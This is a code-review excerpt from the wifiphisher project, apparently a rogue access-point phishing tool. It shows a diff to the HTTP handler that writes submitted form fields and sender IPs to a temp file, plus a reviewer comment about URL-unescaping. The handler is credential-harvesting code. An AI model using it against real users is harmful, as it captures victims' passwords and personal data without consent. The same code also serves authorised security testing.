wifiphisher/common/phishinghttp.py

```diff
@@ -46,26 +46,24 @@ def get(self, url):
                 log_file.write('[' + T + '*' + W + '] ' + O + "GET" + W + " request from " + T +
                                self.request.remote_ip + W + " for " + self.request.full_url() +
                                "\n")
-                log_file.close()
         # Ignore weird requests
         except:
             pass
 
-    def post(self, url):
+    def post(self):
         form_data = self.request.body.split('&')
         form_values = []
         for each_form_data in form_data:
             form_values.append(each_form_data.split('='))
         for input_name,input_value in form_values:
             with open("/tmp/wifiphisher-webserver.tmp", "a+") as log_file:
-                log_file.write('[' + T + '*' + W + '] ' + O + "POST" + W + " request from " + T +
-                               self.request.remote_ip + G + input_name + W + 
-                               " : " + R + input_value + W + 
-                               "\n")
-                log_file.close()
+                log_file.write('[' + T + '*' + W + '] ' + O + "POST" + W + " request from " +
+                               T + self.request.remote_ip + G +
+                               tornado.escape.url_unescape(input_name) + W + " : " + R + 
```

Comment:
If you implement `tornado.escape.url_unescape` at the top you shouldn't need to use it here as well as [here](https://github.com/wifiphisher/wifiphisher/pull/523/files/7eef4214daefef6a93e46ba75007d94852de0e6f..736569bc89e185890861905283ec9ef6a356ba75#diff-bedcff8d1cb95b8d851d5facda4a89ceR63).